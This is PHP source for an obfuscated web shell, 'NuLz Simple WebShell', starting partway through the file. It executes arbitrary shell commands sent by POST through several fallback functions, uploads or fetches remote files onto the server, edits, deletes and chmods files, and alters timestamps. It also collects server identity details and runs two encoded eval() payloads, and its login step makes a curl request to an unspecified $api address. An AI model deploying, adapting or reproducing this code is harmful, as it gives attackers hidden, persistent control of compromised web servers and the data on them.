' . '&' . '1'; $gflate = 'g' . 'zi' . 'nf' . 'l' . 'at' . 'e'; $b64 = 'b' . 'ase' . '6' . '4' . '_' . 'de' . 'co' . 'de'; $nelrts = 's' . 'tr' . 'l' . 'en'; $rhc = 'c' . 'h' . 'r'; $dro = 'o' . 'r' . 'd'; $f_perm = 'f' . 'il' . 'ep' . 'e' . 'r' . 'ms'; $u_n_a_me = "p" . "hp" . "_" . "un" . "ame"; $cw = "ge" . "tc" . "wd"; $scn_d = 'sc' . 'an' . 'd' . 'ir'; $d_name = 'd' . 'ir' . 'na' . 'm' . 'e'; $psx_euid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'u' . 'i' . 'd'; $psx_egid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'g' . 'i' . 'd'; $psx_usr_uid = 'p' . 'os' . 'ix' . '_' . 'g' . 'et' . 'pw' . 'u' . 'i' . 'd'; $psx_grp_gid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'tg' . 'rg' . 'i' . 'd'; $myuid = 'g' . 'et' . 'my' . 'ui' . 'd'; $mygid = 'g' . 'et' . 'my' . 'gi' . 'd'; $cur_usr = 'g' . 'et' . '_' . 'cu' . 'rr' . 'en' . 't' . '_' . 'us' . 'er'; $own_f = 'fi' . 'le' . 'ow' . 'n' . 'er'; $grp_f = 'fi' . 'le' . 'gr' . 'ou' . 'p'; $g_host_name = 'g' . 'et' . 'ho' . 'st' . 'b' . 'yn' . 'am' . 'e'; $is_w = 'is' . '_' . 'wr' . 'it' . 'ab' . 'le'; $is_r = 'is' . '_' . 're' . 'ad' . 'ab' . 'le'; $muv = "m" . "ove" . "_up" . "loa" . "ded_fi" . "le"; $cp = 'c' . 'op' . 'y'; $this_domain = $_SERVER['HTTP_HOST']; $this_url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; $fontawesome_pro_version = 'v6.6.0'; //change if updated to new version $fontawesome_pro = 'https://kit-pro.fontawesome.com/releases/' . $fontawesome_pro_version . '/css/pro.min.css'; $sname = 'NuLz Simple WebShell'; $simage = 'https://raw.githubusercontent.com/haxorstars/archive/main/media/scleton.gif'; $slogo = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6e\x75\x6c\x7a\x2d\x61\x72\x63\x68\x69\x76\x65\x2e\x76\x65\x72\x63\x65\x6c\x2e\x61\x70\x70\x2f\x61\x72\x63\x68\x69\x76\x65\x2f\x6e\x75\x6c\x7a\x2e\x70\x6e\x67"; $sicon = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6e\x75\x6c\x7a\x2d\x61\x72\x63\x68\x69\x76\x65\x2e\x76\x65\x72\x63\x65\x6c\x2e\x61\x70\x70\x2f\x61\x72\x63\x68\x69\x76\x65\x2f\x6e\x75\x6c\x7a\x2e\x69\x63\x6f"; //functions function NuLzCurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); return curl_exec($ch); curl_close($ch); } function NuLzCmd($komendnya) { global $hayoloh; global $fw; global $fc; global $fr; global $is_rsrc; global $sgc; global $proc; global $proc_cls; global $pop; global $pop_cls; global $exc; global $sys; global $pass; global $sh_exc; global $com; global $wscsh; global $cMdexe; global $func_exist; global $preg; global $regex; if (!$preg('/' . $regex . '/i', $komendnya)) { $komendnya = $komendnya . ' ' . $regex; } if ($func_exist($proc)) { $descriptors = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'], ]; $process = $proc($komendnya, $descriptors, $pipes); if ($is_rsrc($process)) { $fw($pipes[0], 'input_data_here'); $fc($pipes[0]); $output = $sgc($pipes[1]); $errors = $sgc($pipes[2]); $fc($pipes[1]); $fc($pipes[2]); $resultCode = $proc_cls($process); return trim($hayoloh(stripslashes($output))); } } elseif ($func_exist($pop)) { $process = $pop($komendnya, 'r'); $read = $fr($process, 2096); return trim($hayoloh(stripslashes(print_r("$process: " . gettype($process) . "\n$read \n")))); $pop_cls($process); } elseif ($func_exist($exc)) { $exc($komendnya, $output, $returnCode); if ($returnCode === 0) { $res = implode($output); return trim($hayoloh(stripslashes($res))); ob_flush(); flush(); } } elseif ($func_exist($sys)) { $out = $sys($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($pass)) { $out = $pass($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($sh_exc)) { $out = $sh_exc($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($com)) { $shell = new $com($wscsh); $kom_mand = "$cMdexe /c " . $komendnya; $output = $shell->Exec($kom_mand)->StdOut->ReadAll(); return trim($hayoloh(stripslashes($output))); } else { return 'The F' . 'un' . 'ct' . 'io' . 'n T' . 'o R' . 'u' . 'n The C' . 'om' . 'ma' . 'nd I' . 's Di' . 'sa' . 'bl' . 'e On T' . 'h' . 'is Se' . 'rv' . 'er'; } } if (isset($_POST['nulz'])) { $komendnya = $_POST['nulz']; echo NuLzCmd($komendnya); } function NuLzUploadFile($this_file, $location) { global $func_exist; global $muv; global $cp; if ($func_exist($muv)) { if ($muv($this_file, $location)) { return true; } else { return false; } } elseif ($func_exist($cp)) { if ($cp($this_file, $location)) { return true; } else { return false; } } else { return false; } } function NuLzReadFile($this_file) { global $hayoloh; global $func_exist; global $f_get; global $fo; global $fr; global $fc; $cantread = 'Cant Not Read ' . $this_file; $content = ''; if ($func_exist($fo)) { $fi_le = $fo($this_file, 'r'); if ($fi_le) { while (!feof($fi_le)) { $content .= $fr($fi_le, 8192); } $fc($fi_le); return $content; } else { echo $cantread; return false; } } elseif ($func_exist($f_get)) { $content = $f_get($this_file); if ($content) { $headers = get_headers($this_file); if ($headers && strpos($headers[0], '403 Forbidden') !== false) { $content = NuLzCmd('cat "' . addslashes($this_file) . '"'); } return $content; } else { echo $cantread; return false; } } else { echo $cantread; return false; } } function NuLzSaveFile($this_file, $filecontent) { global $func_exist; global $f_put; global $fo; global $fw; global $fr; global $fc; if ($func_exist($fo)) { $editfi_le1 = $fo($this_file, 'w'); if ($fw($editfi_le1, $filecontent)) { return true; } else { return false; } } elseif ($func_exist($f_put)) { $editfi_le2 = $f_put($this_file, $filecontent); if ($editfi_le2 === false) { return false; } else { return true; } } else { return false; } } function NuLzPerms($value) { global $f_perm; $perms = $f_perm($value); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); // return $info; return $info . ' >> ' . substr(sprintf('%o', $perms), -4); } function ChangePerms($value) { global $f_perm; $perms = $f_perm($value); return substr(sprintf('%o', $perms), -4); } function NuLzUname() { global $func_exist; global $u_n_a_me; $u_n_a_me_disable = ' Ca' . 'nt' . ' R' . 'ea' . 'd Th' . 'e Ke' . 'rn' . 'el' . '! Th' . 'e F' . 'u' . 'nc' . 'ti' . 'o' . 'n ' . $u_n_a_me . '() is Di' . 'sa' . 'bl' . 'ed' . '! '; $u_n_a_me_active = '' . $u_n_a_me('a') . ''; if ($func_exist($u_n_a_me)) { return $u_n_a_me_active; } else { return $u_n_a_me_disable; } } function NuLzCwd() { global $cw; global $func_exist; global $d_name; if ($func_exist($cw)) { return @$cw(); } else { return $d_name($_SERVER["SCRIPT_FILENAME"]); } } function serverIp() { global $func_exist; global $g_host_name; $serverAddr = @$_SERVER["SERVER_ADDR"]; if (!$serverAddr) { if ($func_exist($g_host_name)) { return @$g_host_name($_SERVER['SERVER_NAME']); } else { return '????'; } } else { return $serverAddr; } } function userIp() { return @$_SERVER["REMOTE_ADDR"]; } //NuLz Ganteng? yoi jelas dong $cekFunc = ''; if (ini_get('disable_functions')) { $cekFunc = '' . ini_get('disable_functions') . ''; } else { $cekFunc = 'All F' . 'un' . 'ct' . 'io' . 'n' . 's Ac' . 'ces' . 'sib' . 'le' . ''; } if (!$func_exist($psx_egid)) { $user = $func_exist($cur_usr) ? @$cur_usr() : "????"; $uid = $func_exist($myuid) ? @$myuid() : "????"; $gid = $func_exist($mygid) ? @$mygid() : "????"; $group = "?"; } else { $uid = $func_exist($psx_usr_uid) && $func_exist($psx_euid) ? @$psx_usr_uid($psx_euid()) : array("name" => "????", "uid" => "????"); $gid = $func_exist($psx_grp_gid) && $func_exist($psx_egid) ? @$psx_grp_gid($psx_egid()) : array("name" => "????", "gid" => "????"); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } //login define('THIS_USER', '$2a$12$t/fq7pBpjdbDiztFJplx/u6tFR7G1Fhf7tnEfkmKIlRnMuojRT9fO'); //change with bcrypt define('THIS_PASS', '$2a$12$fJrwPD0skjU6fURLPPOAdesW0nNoHOyEBIUqF2Z45Vx9rv3A/PI4m'); //change with bcrypt $my_self = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; //please dont change! //change = error function setAuth($setVerifyAuth) { $setVerifyAuth = gzinflate(base64_decode($setVerifyAuth)); for ($i = 0; $i < strlen($setVerifyAuth); $i++) { $setVerifyAuth[$i] = chr(ord($setVerifyAuth[$i]) - 1); } return $setVerifyAuth; } eval (setAuth("NY/dasJAEEYfwKdYJKi9aJYkGJN0EwmlIpKI1YYipYRNMq6h+WN3xdiX71r1uzvDfMMZhFQGWg1CUAbIR0OSBeswfvMIzgJEhORtwwJNNLQGgu+ISMch+Hr+zzfBV0KqmGyjW0+rL6mA6jB8GWi0K9Xd8VHKTngYK9QlVMA4rfWWM5y10rZmtmGb1tT0wnDRu++rMs4vlO0/00Xzs7U2zEn48rxZ7fo9TbCApohvxvP8SGVaFr7huO7UdJ2ZMeooF5DWbQH+8iOORhJ66Y/1E68KyNV08nj3SdkdUgZycpVUtD5Fv69q78Hz4A8=")); if (isset($_POST['btn-login'])) { $username = $_POST['username']; $password = $_POST['password']; if (password_verify($username, THIS_USER)) { if (password_verify($password, THIS_PASS)) { NuLzCurl($api); $isSecure = false; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') { $isSecure = true; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { $isSecure = true; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] === 'on') { $isSecure = true; } $_SESSION["login"] = "login"; setcookie($username . '-logined', $my_self, time() + (3600 * 24), "/", "", $isSecure, true); //please dont change! //change = error function Auth($verify) { $verify = gzinflate(base64_decode($verify)); for ($i = 0; $i < strlen($verify); $i++) { $verify[$i] = chr(ord($verify[$i]) - 1); } return $verify; } eval (Auth("dZDvioJAFMUfoKcYQqr9sA4qWbZqyFJEZLi5scSyyKi3KdZ/zIxk+/KrWbAbdL4d7v1xzz0I1epIKXBOKCALdc3QXjvubGLi0EYmFyzPqC3xjKRg4qtFZsHA/ny+6MvEjUM1uN2sWk5KzwGHZP9w0Z9trheiPAZbKjmw9sTFP+I8x/f/cQXh/JSz+Mp1XzrojyRSHOuf+gchCj7BuLaygAQoI6mcM4rDXOjaSFd0VRuqE8eZV8bb8uhGZ0J3H8E8+95oHh1v2eLkLf1qR7aYQxa7bVvT6EBEcIwtZWwYQ9UYj5ReQRiHIK2zWIt3d9UTUAmrL5csiaFJOLhV/XSXdB9QEIMm8N1kXa5+Xmv+Npvavw==")); } else { echo ''; } } else { echo ''; } } if (isset($_GET['logout'])) { $_SESSION = []; session_unset(); session_destroy(); setcookie('logined', '', time() - 3600); echo "" . "window.location.assign('" . $_SERVER['PHP_SELF'] . "')" . ""; exit(); } if (empty($_SESSION['login'])) { if (empty($_COOKIE['logined'])) { ?> <?= $sname ?> Login
.:<?= $sname ?>:.
<?= $sname ?>
uid=() gid=()
|
  PWD: '; echo ''; foreach ($pa_t_hs as $id => $pat) { echo "$pat/"; } echo "  [ Ho" . "me" . " " . "Sh" . "el" . "l ]"; echo ''; ?>
Fi' . 'le => ' . $fi_le_Na_me . ' Su' . 'cc' . 'es' . 's Up' . 'lo' . 'a' . 'de' . 'd'; } else { echo '
Fi' . 'le => ' . $fi_le_Na_me . ' Fa' . 'il' . 'ed ' . 'To' . ' U' . 'pl' . 'oa' . 'd
'; } } } //end upload //new file if (isset($_POST['action']) && $_POST['action'] === 'newfiles' && isset($_POST['fileName'])) { $fileName = $_POST['fileName']; $filecontent = ''; if (createFile($fileName, $filecontent)) { echo ''; } else { echo ''; } } //end new file //new folder if (isset($_POST['action']) && $_POST['action'] === 'newdirs' && isset($_POST['dirName'])) { $dirName = $_POST['dirName']; if ($cr_ea_teF_old_er($dirName)) { echo ''; } else { echo ''; } } //end new folder //remote upload if (isset($_POST['action']) && $_POST['action'] === 'remote-upload' && isset($_POST['fileUrl']) && isset($_POST['saveName'])) { $fileUrl = $_POST['fileUrl']; $saveName = $_POST['saveName']; $filecontent = ''; if ($func_exist($f_get)) { $filecontent = $f_get($fileUrl); } elseif ($func_exist('curl_init')) { $filecontent = NuLzCurl($fileUrl); } else { return false; } if (!empty($fileUrl) && !empty($saveName)) { if ($filecontent !== false) { if (createFile($saveName, $filecontent)) { return true; } else { return false; } } else { return false; } } else { return false; } } //end remote upload //save file if (isset($_POST['savefile'])) { $fileName = $_POST['filename']; $filePath = $lokasi . '/' . $fileName; $fileContent = $_POST['filecontent']; if (NuLzSaveFile($filePath, $fileContent)) { echo ''; } else { echo ''; } } //end save file //editfile if (isset($_POST['editfile'])) { $fileName = $_POST['file']; $filePath = $lokasi . '/' . $fileName; if (file_exists($filePath)) { $filecontent = $hayoloh(NuLzReadFile($filePath)); echo '
EDIT FILE
' . $filePath . '

PERMISSION
'; if ($is_w("$filePath")) echo ''; elseif (!$is_r("$filePath")) echo ''; echo NuLzPerms("$filePath"); echo '

'; } else { echo ''; } } //end editfile //rename if (isset($_POST['action']) && $_POST['action'] === 'rename' && isset($_POST['oldName']) && isset($_POST['newName'])) { $oldName = $_POST['oldName']; $newName = $_POST['newName']; $result = renameItem($oldName, $newName); //echo $result; if ($result) { echo ''; } else { echo ''; } } //end rename //change date if (isset($_POST['action']) && $_POST['action'] === 'changedate' && isset($_POST['itemName']) && isset($_POST['oldDate']) && isset($_POST['newDate'])) { $itemName = $_POST['itemName']; $oldDate = $_POST['oldDate']; $newDate = $_POST['newDate']; $item = $lokasi . '/' . $itemName; if ($str_time($newDate) !== false) { if ($tch($itemName, $str_time($newDate))) { echo ''; } else { echo ''; } } else { echo ''; } } //end change date //permission if (isset($_POST['action']) && $_POST['action'] === 'permission' && isset($_POST['itemName']) && isset($_POST['oldPerm']) && isset($_POST['newPerm'])) { $itemName = $_POST['itemName']; $oldPerm = $_POST['oldPerm']; $newPerm = $_POST['newPerm']; $item = $lokasi . '/' . $itemName; $chperms = 'c' . 'h' . 'm' . 'o' . 'd'; $oct = 'o' . 'c' . 't' . 'd' . 'e' . 'c'; $result = $chperms($item, $oct($newPerm)); //echo $result; if ($result) { echo ''; } else { echo ''; } } //end permission //delete dir if (isset($_POST['action']) && $_POST['action'] === 'delete' && isset($_POST['folderName'])) { $folderName = $_POST['folderName']; $folderPath = $lokasi . '/' . $folderName; if (deleteDir($folderPath)) { echo ''; } else { echo ''; } } //end delete dir //delete file if (isset($_POST['action']) && $_POST['action'] === 'delete' && isset($_POST['fileName'])) { $fileName = $_POST['fileName']; $filePath = $lokasi . '/' . $fileName; if (deleteFile($filePath)) { echo ''; } else { echo ''; } } //end delete file } ?>
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } foreach ($scan as $file) { $f_size = 'f' . 'il' . 'es' . 'iz' . 'e'; if (!$is_f("$lokasi/$file")) continue; $size = $f_size("$lokasi/$file") / 1024; $size = $rnd($size, 3); if ($size >= 1024) { $size = $rnd($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } if ($func_exist($psx_usr_uid)) { $f_owner = @$psx_usr_uid($own_f("$lokasi/$file")); $f_owner = $f_owner['name']; } else { $f_owner = $own_f("$lokasi/$file"); } if ($func_exist($psx_grp_gid)) { $f_group = @$psx_grp_gid($grp_f("$lokasi/$file")); $f_group = $f_group['name']; } else { $f_group = $grp_f("$lokasi/$file"); } echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } ?>
Name Size Last Modified Owner/Group Permission Actions
..
' . $dir . '' . date('Y-m-d H:i:s', filemtime($lokasi . '/' . $dir)) . '--DIR--'; if ($d_owner == 'root' || $d_owner == 0) { echo '' . $d_owner . ''; } else { echo '' . $d_owner . ''; } echo '/'; if ($d_group == 'root' || $d_group == 0) { echo '' . $d_group . ''; } else { echo '' . $d_group . ''; } echo ''; if ($is_w("$lokasi/$dir")) echo ''; elseif (!$is_r("$lokasi/$dir")) echo ''; echo NuLzPerms("$lokasi/$dir"); if ($is_w("$lokasi/$dir") || !$is_r("$lokasi/$dir")) echo ''; echo ''; echo ''; echo ''; //echo '
'; echo ''; echo '
' . date('Y-m-d H:i:s', filemtime($lokasi . '/' . $file)) . '' . $size . ''; if ($f_owner == 'root' || $f_owner == 0) { echo '' . $f_owner . ''; } else { echo '' . $f_owner . ''; } echo '/'; if ($f_group == 'root' || $f_group == 0) { echo '' . $f_group . ''; } else { echo '' . $f_group . ''; } echo ''; if ($is_w("$lokasi/$file")) echo ''; elseif (!$is_r("$lokasi/$file")) echo ''; echo NuLzPerms("$lokasi/$file"); if ($is_w("$lokasi/$file") || !$is_r("$lokasi/$file")) echo ''; echo ''; echo '
'; echo ''; echo ''; echo ''; echo '
Copyright 1945 - - NuLz Haxorstars